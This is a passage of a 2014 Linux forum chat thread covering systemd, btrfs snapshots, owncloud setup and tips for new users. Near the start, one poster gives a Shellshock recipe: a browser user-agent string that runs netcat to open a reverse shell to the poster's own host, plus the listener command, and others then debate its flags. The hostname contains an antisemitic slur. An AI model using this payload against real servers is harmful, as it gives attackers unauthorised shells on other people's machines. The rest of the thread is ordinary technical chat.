• General Linux Chat and Small Questions v. I broke my Arch Install
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1. Set user agent to "() { :;}; nc hitler.killallje.ws 12345 -c /bin/sh" 2. Run "nc -lp 12345 -vv" on server 3. Browse as usual 4. ??? 5. Shells!
Shouldn't that be "-e /bin/sh" ?
[QUOTE=IpHa;46093198]Shouldn't that be "-e /bin/sh" ?[/QUOTE] eh potato patato. I'm using a slight variation anyway now. nc killallje.ws 12345 -c exit I have a script running that notifies me when someone connects
What version of netcat are you using? On mine "-c" is close connection on EOF.
[QUOTE=IpHa;46093212]What version of netcat are you using? On mine "-c" is close connection on EOF.[/QUOTE] there are like 100 versions of netcat out there all with their own implimentation. The -c exit makes sure that the connection closes with 100% certainty. also: [t]http://i.imgur.com/MhNagQp.png[/t]
With the rise in security issues for linux, I checked my apache access log. Is it a problem if things like this are appearing in my logs? [quote]173.208.x - - [27/Sep/2014:02:45:28 -0600] "HEAD /fop/index.php/system/fckeditor/editor/ HTTP/1.1" 200 - 173.208.x - - [27/Sep/2014:02:45:28 -0600] "HEAD /fop/index.php/inc/fckeditor/editor/ HTTP/1.1" 200 - 173.208.x - - [27/Sep/2014:02:45:28 -0600] "HEAD /fop/index.php/admin/fckeditor/editor/ HTTP/1.1" 200 - 173.208.x - - [27/Sep/2014:02:45:28 -0600] "HEAD /fop/index.php/editor/fckeditor/editor/ HTTP/1.1" 200 - 173.208.x - - [27/Sep/2014:02:45:28 -0600] "HEAD /fop/index.php/manage/fckeditor/editor/ HTTP/1.1" 200 - 173.208.x - - [27/Sep/2014:02:45:28 -0600] "HEAD /fop/index.php/editor/editor/ HTTP/1.1" 200 - 173.208.x - - [27/Sep/2014:02:45:28 -0600] "HEAD /fop/index.php/includes/fckeditor/editor/ HTTP/1.1" 200 - 173.208.x - - [27/Sep/2014:02:45:28 -0600] "HEAD /fop/index.php/common/fckeditor/editor/ HTTP/1.1" 200 - 173.208.x - - [27/Sep/2014:02:45:28 -0600] "HEAD /fop/index.php/include/fckeditor/editor/ HTTP/1.1" 200 - 173.208.x - - [27/Sep/2014:02:45:28 -0600] "HEAD /fop/index.php/fck/editor/ HTTP/1.1" 200 - 173.208.x - - [27/Sep/2014:02:45:28 -0600] "HEAD /fop/index.php/Fckeditor/editor/ HTTP/1.1" 200 - 173.208.x - - [27/Sep/2014:02:45:28 -0600] "HEAD /fop/index.php/FCKeditor/editor/ HTTP/1.1" 200 - 173.208.x - - [27/Sep/2014:02:45:28 -0600] "HEAD /fop/index.php/js/fckeditor/editor/ HTTP/1.1" 200 - 173.208.x - - [27/Sep/2014:02:45:28 -0600] "HEAD /fop/index.php/Fckeditorold/editor/ HTTP/1.1" 200 - 173.208.x - - [27/Sep/2014:02:45:28 -0600] "HEAD /fop/index.php/Fckeditornew/editor/ HTTP/1.1" 200 - 173.208.x - - [27/Sep/2014:02:45:28 -0600] "HEAD /fop/index.php/fckeditor/editor/ HTTP/1.1" 200 - 173.208.x - - [27/Sep/2014:02:45:28 -0600] "HEAD /fop/index.php/scripts/fckeditor/editor/ HTTP/1.1" 200 -[/quote] [editline]asdf[/editline] Oh it's fine apparently.
I have installed owncloud (using a guide) onto a VPS I have, I can get the page up on my browser although it is giving me a warning about a htacess file? Your data directory and files are probably accessible from the internet because the .htaccess file does not work. For information how to properly configure your server, please see the documentation. I have found a guide that seems to show how to solve this, although it is asking me to go to the directory where I have installed owncloud, I do not know where this though, how can I go about finding it? I am using Debian 64 bit, I am really fairly new to this and have only set up a MC server and a mumble server before this.
I just made a sytemd service in 3 minutes. I still don't get why people hate it [t]http://i.imgur.com/pOthblk.png[/t] [editline]30th September 2014[/editline] [QUOTE=ThePunisher1;46116814]I have installed owncloud (using a guide) onto a VPS I have, I can get the page up on my browser although it is giving me a warning about a htacess file?[/QUOTE] What guide, what server software and what owncloud version.
[QUOTE=Mega1mpact;46117187]I just made a sytemd service in 3 minutes. I still don't get why people hate it [t]http://i.imgur.com/pOthblk.png[/t] [editline]30th September 2014[/editline] What guide, what server software and what owncloud version.[/QUOTE] The error has gone away for some reason, should I be worried?
[QUOTE=Mega1mpact;46117187][t]http://i.imgur.com/pOthblk.png[/t][/QUOTE] What terminal program is that? It looks pretty
[QUOTE=Adam.GameDev;46117335]What terminal program is that? It looks pretty[/QUOTE] Gnome-terminal
[QUOTE=Mega1mpact;46117187]I just made a sytemd service in 3 minutes. I still don't get why people hate it [/QUOTE] People have their reasons. Some are just preference. Some are factual differences. If you don't get why people hate it, and you actually like it, then you should probably keep using it. I don't like it, and I like musl and OpenRC, so those are what I use. All have their ups and downs, and neither is "perfect" for every task ever. But they all can do a lot of jobs very well.
I just PEBKAC'd so hard on #debian on freenode, I probably hit a new world record in being stupid. Then I wasted people's time for like, half an hour on #systemd. Never once was I yelled at, and nobody implied I was an idiot. It's quite refreshing not using Arch.
[QUOTE=nikomo;46124408]I just PEBKAC'd so hard on #debian on freenode, I probably hit a new world record in being stupid. Then I wasted people's time for like, half an hour on #systemd. Never once was I yelled at, and nobody implied I was an idiot. It's quite refreshing not using Arch.[/QUOTE] The Arch community is pretty Toxic from what I've seen. It's userbase (judging by IRC and Forum activity) is pretty much up there with the pretendious douchebag son who has a stinkin rich dad.
[QUOTE=kaukassus;46125056]The Arch community is pretty Toxic from what I've seen. It's userbase (judging by IRC and Forum activity) is pretty much up there with the pretendious douchebag son who has a stinkin rich dad.[/QUOTE] It's the Arch Way
[QUOTE=kaukassus;46125056]The Arch community is pretty Toxic from what I've seen. It's userbase (judging by IRC and Forum activity) is pretty much up there with the pretendious douchebag son who has a stinkin rich dad.[/QUOTE] Arch is great, #archlinux is awful. You got a question, looked at the wiki pages, well that's all you're going to linked to anyway. Ask if someone has had any success of x configuration, just go try it they'll say. There are a few helpful people but yeah, my experience has been less than stellar.
starting to think that installing Xubuntu on my housemate's laptop was a bad idea. dumbass forgot her password and i had to reset it, and now she's whining to me because the login keyring is giving her issues, I'm trying to walk her through resetting it but she doesn't understand how to remove a file this lady told me repeatedly that she's a 'computer expert' and was a project leader for several companies.. For some reason, I kind of doubt it. [editline]1st October 2014[/editline] oh and she's dead set on thinking that her ex boyfriend is hacking into it and loves to say "you think you're the only one who knows open source? He can hack into this easy!" :v: maybe if she's so paranoid I can put her on a TAILS system
Do any of you run Arch on an AMD card? Got a Linux itch again and the last 5 times that happened I had a Nvidia card so not sure if its worse with AMD.
I'm starting to love btrfs. It's so easy to set up a raid array(redundant array of independent disks array?) and incremental backups.
i know someone asked what the advantage of btrfs was over ext4 but i'm an idiot and forget, what was it again?
[QUOTE=lavacano;46129078]i know someone asked what the advantage of btrfs was over ext4 but i'm an idiot and forget, what was it again?[/QUOTE] * Snapshots * Subvolumes (IDK if ext4 had that) * COmpression (IDK if ext4 had that) * And a shitload of others. thats the ones I know
[QUOTE=IpHa;46128379]I'm starting to love btrfs. It's so easy to set up a raid array(redundant array of independent disks array?) and incremental backups.[/QUOTE] Does BTRFS support sending incremental snapshots yet? It's one of the reasons I'd prefer ZFS over BTRFS for my home computers, but I'd like to know for sure.
:D Finally moved to linux mint after waiting 40 days for a wifi adapter to arrive from aliexpress/china (free shipping from china - never again). Happy to finally have a dev environment for coding that is the same as my production. What are some things that I might not immediately know about using linux that you guys found useful? Any tips/tricks would be great.
[QUOTE=mastersrp;46129963]Does BTRFS support sending incremental snapshots yet? It's one of the reasons I'd prefer ZFS over BTRFS for my home computers, but I'd like to know for sure.[/QUOTE] Yes, if the parent snapshot exists on both ends. [code]btrfs send -p <old snapshot> <new snapshot> | btrfs receive <dest>[/code]
[QUOTE=IpHa;46130833]Yes, if the parent snapshot exists on both ends. [code]btrfs send -p <old snapshot> <new snapshot> | btrfs receive <dest>[/code][/QUOTE] What if the parent snapshot doesn't exist? Will it then send a combined snapshot? I mean does it actually support incremental journalling snapshot sending and receiving?
[QUOTE=Hng;46130680]:D Finally moved to linux mint after waiting 40 days for a wifi adapter to arrive from aliexpress/china (free shipping from china - never again). Happy to finally have a dev environment for coding that is the same as my production. What are some things that I might not immediately know about using linux that you guys found useful? Any tips/tricks would be great.[/QUOTE] always try and install programs using your package manager first before resorting to groping around with tarballs you downloaded off some strange site ctrl alt backspace restarts X11 which is handy, i think you gotta enable it in the settings on mint [editline]2nd October 2014[/editline] oh yeah and watch out for the teledildonics crowd you probably don't want any of the emacs plugins they will tell you to install
[QUOTE=Hng;46130680]What are some things that I might not immediately know about using linux that you guys found useful? Any tips/tricks would be great.[/QUOTE] [url=http://mywiki.wooledge.org/BashGuide]Learn the[/url] [url=http://wiki.bash-hackers.org/doku.php]Bash shell[/url]. You'd be surprised how much you can automate with that. Some people also take advantage of this and use the shell as their IDE as part of the [url=https://en.wikipedia.org/wiki/Unix_philosophy]UNIX philosophy[/url]. Embracing it has helped me pass many coding assignments in class. And for cases where you think you're to make your own program in whatever language you use, you might be better off doing it with a shell script, utilizing things like [I]awk(1)[/I] and [I]sed(1)[/I]. [editline]e[/editline] More protips: 1) Try to avoid getting into debates that will be going on 'til the end of time. Vim/Emacs, systemd/other init systems, etc. They're almost always over any new guy's head. 2) Experiment and break things. That's how you get learn things. 3) Don't talk to heretics who use *BSD or Plan 9 unironically. 4) You'll be better off installing packages from repositories and package managers than compiling from source for your sanity. 5) Embrace your inner neckbeard. It all starts with a kiddie learning Ubuntu, followed by the Arch zealot, then the guy whose beard is caught in the tape drive waiting for their kernel to compile.
[QUOTE=Stonecycle;46131577][url=http://mywiki.wooledge.org/BashGuide]Learn the[/url] [url=http://wiki.bash-hackers.org/doku.php]Bash shell[/url]. You'd be surprised how much you can automate with that. Some people also take advantage of this and use the shell as their IDE as part of the [url=https://en.wikipedia.org/wiki/Unix_philosophy]UNIX philosophy[/url]. Embracing it has helped me pass many coding assignments in class. And for cases where you think you're to make your own program in whatever language you use, you might be better off doing it with a shell script, utilizing things like [I]awk(1)[/I] and [I]sed(1)[/I]. [editline]e[/editline] More protips: 1) Try to avoid getting into debates that will be going on 'til the end of time. Vim/Emacs, systemd/other init systems, etc. They're almost always over any new guy's head. 2) Experiment and break things. That's how you get learn things. 3) Don't talk to heretics who use *BSD or Plan 9 unironically. 4) You'll be better off installing packages from repositories and package managers than compiling from source for your sanity. [B]5) Embrace your inner neckbeard. It all starts with a kiddie learning Ubuntu, followed by the Arch zealot, then the guy whose beard is caught in the tape drive waiting for their kernel to compile.[/B][/QUOTE] [t]http://i.imgur.com/VRAziJG.jpg[/t] ? :v:
[QUOTE=kaukassus;46131694][t]http://i.imgur.com/VRAziJG.jpg[/t] ? :v:[/QUOTE] Where does Funtoo and SliTaz leave me?
[QUOTE=kaukassus;46131694][t]http://i.imgur.com/VRAziJG.jpg[/t] ? :v:[/QUOTE] I use Arch and Gentoo shit [editline]2nd October 2014[/editline] I could use a Debian-based distro if apt-get wasn't so awful.
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